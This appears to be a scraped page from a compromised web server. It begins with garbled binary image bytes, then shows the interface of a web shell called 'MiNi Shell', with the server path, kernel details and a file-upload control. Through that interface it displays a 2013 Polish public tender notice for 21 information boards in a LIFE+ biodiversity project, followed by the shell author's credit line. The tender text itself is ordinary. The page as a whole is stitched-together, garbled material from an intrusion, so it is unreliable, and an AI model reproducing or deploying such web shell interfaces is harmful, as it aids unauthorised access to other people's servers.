JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130718/282364-N-2013.html

<p class="kh_header"><b>Warszawa: Zaprojektowanie, wykonanie i umieszczenie 21 tablic informacyjno - promocyjnych w ramach projektu LIFE +</b><br>
<b>Numer ogłoszenia: 282364 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Koordynacji Projektów Środowiskowych , ul. Stawki 2, piętro 20, 00-193 Warszawa, woj. mazowieckie, tel. 22 318 70 82, faks 22 318 70 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckps.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, wykonanie i umieszczenie 21 tablic informacyjno - promocyjnych w ramach projektu LIFE +.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotowa usługa obejmuje zaprojektowanie, wykonanie oraz montaż 21 tablic informacyjno-promocyjnych o wymiarach 0,7m szerokości i 0,5m wysokości wraz z konstrukcją usztywniającą oraz słupkami mocującymi i zamontowanie ich w wyznaczonych przez Zamawiającego lokalizacjach oraz terminach. Za transport przedmiotu zamówienia odpowiada Wykonawca.
2. Tablice informacyjno - promocyjne będące przedmiotem umowy zostaną wykonane wg następującej specyfikacji:
3. Tablice typu dibond lub równoważna, tj. wielowarstwowa płyta poliwęglanowa, o grubości conajmniej 3 mm i wymiarach 0,7m x 0,5m (szerokość x wysokość) z możliwością montażu do ściany lub wolnostojąca
4. Liczba tablic wolnostojących i montowanych do ściany zostanie określona przez Zamawiającego na etapie podpisania umowy.
5. Tablice muszą być wykonane z materiałów trwałych tj. odpornych na warunki atmosferyczne tak aby zapewniona została czytelność informacji oraz wysoki poziom estetyczny tablicy. Powinny mieć na wierzchniej stronie zabezpieczenie w postaci powłoki antygraffity. 
6. W związku z tym Wykonawca zobowiązany jest do udzielenia pisemnej gwarancji na trwałość wykonania i montażu tablic do 31 grudnia 2018 roku od dnia podpisania przez osoby upoważnione 
z obu stron umowy protokołu odbioru końcowego.
7. Gwarancja musi obejmować wszelkie możliwe wady ukryte oraz uszkodzenia tablic i ich montażu powstałe w wyniku działania czynników atmosferycznych.
8. W okresie gwarancji Wykonawca zobowiązuje się do nieodpłatnego usunięcia wad lub dostarczenia niewadliwego przedmiotu zamówienia w wyznaczonym przez Zamawiającego terminie od zgłoszenia usterki przez Zamawiającego. 
9. Mocowanie tablic: każda tablica musi posiadać dwie możliwości montażu tj. do ściany za pomocą uchwytów dystansowego montażu wykonane ze stali nierdzewnej lub aluminium oraz wolnostojąca za pomocą dwóch uchwytów uniwersalnych wykonanych ze stali nierdzewnej lub aluminium (góra i dół tablicy) mocowane na   słupkach o średnicy 50-70 mm. W przypadku tablic wolnostojących, tablica powinna znajdować się na wysokości 1,2m licząc od fundamentu betonowego zapewniającego stabilność całej konstrukcji. Wysokość słupka powinna wynosić co najmniej 1,7m (1,2m nad powierzchnią fundamentu oraz co najmniej 0,5m w fundamencie). Całość powinna być wykonana estetycznie.
10. W przypadku montażu tablicy wolnostojącej Wykonawca zobowiązany jest zaprojektować konstrukcję słupków mocujących tablice oraz określić wielkość fundamentów betonowych zapewniających stabilność konstrukcji. 
11. Tablica do ściany oraz tablica wolnostojąca musi być umieszczona w estetycznej oprawie, jednakże w przypadku tablicy wolnostojącej musi być ona dodatkowo podtrzymywana przez stelaż (aluminiowy lub ze stali nierdzewnej) w pozycji pochylonej pod kątem 60o. 
12. Słupki, stelaż oraz oprawa tablicy muszą być pokryte powłoką odporną na działanie czynników atmosferycznych.
13. Do każdej tablicy wykonawca dołączy uchwyty do dystansowego montażu do ściany oraz uchwyty uniwersalne (obejmy) wraz z słupkami do montażu wolnostojącego. 
14. Dostawa tablic: wszystkie tablice zostaną dostarczone i zamontowane w miejscach wskazanych przez Zamawiającego zgodnie z tabelą nr 1.
Tabela nr 1. Miejsca dostarczenia tablic informacyjnych
Lp.	Miejsce dostawy i montażu tablicy	Ilość tablic
1 Nadleśnictwo Stuposiany	1 szt.
2 Instytut Badań Ssaków -  Białystok	2 szt.
3 Nadleśnictwo Świętoszów	1 szt.
4 Nadleśnictwo Ruszów	1 szt.
5 Nadleśnictwo Głęboki Bród	1 szt.
6 Nadleśnictwo Sobibór	1 szt.
7 Nadleśnictwo Lutowiska	1 szt.
8 Muzeum Łąki w Owczarach	1 szt.
9 Nadleśnictwo Strzałowo	1 szt. 
10 Nadleśnictwo Kaliska	1 szt. 
11 RDLP Białystok	1 szt. 
12 Nadleśnictwo Limanowa	1 szt.
13 Nadleśnictwo Łopuchówko	1 szt.
14 Park Krajobrazowy Puszczy Rominckiej	2 szt. 
15 LZD Rogów 	1 szt.
16 Nadleśnictwo Łochów	1 szt.
17 Nadleśnictwo Krzystkowice	1 szt.
18 Nadleśnictwo Włocławek	1 szt.
19 Nadleśnictwo Spychowo	1 szt.
Dokładna lokalizacja montażu na terenie poszczególnych jednostek będzie wskazana przez Zamawiającego po podpisaniu umowy. 
Grafika na wszystkich tablicach będzie posiadać wspólne elementy związane z promocją projektu. 
- logo projektu, Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej, logo LIFE+, Centrum Koordynacji Projektów Środowiskowych dostarczone przez Zamawiającego,
- informacja o współfinansowaniu Projekt współfinansowany ze środków Unii Europejskiej  w ramach instrumentu finansowego LIFE+ oraz Narodowego Funduszu Ochrony Środowiska  i Gospodarki Wodnej,
- tytuł i numer projektu LIFE Ochrona różnorodności biologicznej na obszarach leśnych w tym w ramach sieci Natura 2000 - promocja najlepszych praktyk (Best for Biodiversity) numer LIFE10/INF/PL/673.
15. Informacje tj. tekst, zdjęcia, grafika, jakie będą umieszczone na tablicy informacyjno-promocyjnej zostaną przekazane przez Zamawiającego.
16. Wykonawca na tablicy umieści kod QR, który po zeskanowaniu będzie odsyłał do strony projektu Best for Biodiversity (www.bestpractice-life.pl)
17. Projekt graficzny tablic informacyjnych leży po stronie Wykonawcy z uwzględnieniem szablonu tablicy (tzw. matrycy) przekazanej przez Zamawiającego w dniu podpisania umowy.
18. Wykonawca przekaże Zamawiającemu opracowany projekt graficzny tablic, o którym mowa w ust. 17 niniejszego paragrafu w ciągu 10 dni kalendarzowych od dnia podpisania Umowy.
19. Zamawiający zaakceptuje lub wniesie uwagi do przedstawionego projektu graficznego tablic, w ciągu 7 dni kalendarzowych od dnia przekazania tego projektu przez Wykonawcę.
20. W przypadku wniesienia uwag przez Zamawiającego do przedstawionego projektu, o którym mowa  w ust. 19 niniejszego paragrafu, Wykonawca wprowadzi i przekaże do projektu zmiany wynikające  z tych uwag, w ciągu 7 dni kalendarzowych od dnia przekazania uwag przez Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 31.52.32.00-0, 79.82.25.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów (niezależnie od charakteru prawnego łączących go z nimi stosunków), zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 2. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza. 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt 5 i 6, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 4. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5. Zasady udziału w postępowaniu Wykonawców występujących wspólnie o udzielenie zamówienia:
5.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w oryginale. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza; 5.2. Oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana i oznaczona w taki sposób by prawnie zobowiązywała wszystkie podmioty. 5.3. Oświadczenie o spełnianiu warunków z art. 22 ust. 1 , Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć łącznie (na jednym druku) - w przypadku łącznego spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, albo każdy z Wykonawców odrębnie, w przypadku jeżeli taki Wykonawca spełnia samodzielnie wszystkie warunki udziału w postępowaniu. 5.4. oświadczenie o braku podstaw do wykluczenia oraz listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej składa oddzielnie każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany maks. 4 miejsc dostawy i montażu tablicy określonych  w tabeli nr 1 ust. 13 § 2 niniejszej umowy, nie później jednak niż na 21 dni kalendarzowych przed terminem realizacji zamówienia określonym w § 3 ust. 1 niniejszej umowy.
2. Zamawiający dopuszcza przedłużenie terminu realizacji zamówienia, o którym mowa w § 3 ust. 1  w następujących sytuacjach:
a) W przypadku, gdy akceptacja projektu graficznego tablic informacyjnych nastąpi po 30 września 2013 r., nie dłużej jednak niż o 30 dni kalendarzowych;
b) W przypadku, gdy z powodu niesprzyjających warunków atmosferycznych w miejscu dostawy i montażu tablic określonym w § 2 ust. 13 tabela nr 1, nie jest możliwe wykonanie montażu zgodnie z zasadami bezpieczeństwa i higieny pracy,  nie dłużej jednak niż o 30 dni kalendarzowych;
3. Zmiany dotyczące wskazanych w treści umowy osób do kontaktów, zmiany siedziby Wykonawcy lub Zamawiającego, nie wymagają sporządzenia aneksu do Umowy, a jedynie pisemnego powiadomienia drugiej strony.
4. Nie wymaga sporządzenia aneksu do umowy również dokonana przez Wykonawcę w trakcie realizacji umowy, zmiana formy zabezpieczenia należytego wykonania umowy. Zmiana dokonywana jest na zasadach określonych w ustawie Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/ckps_warszawa/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Koordynacji Projektów Środowiskowych, ul. Stawki 2, piętro 20, 00-193 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2013 godzina 10:45, miejsce: Centrum Koordynacji Projektów Środowiskowych, ul. Stawki 2, piętro 20, 00-193 Warszawa - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach instrumentu finansowego LIFE+ oraz Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com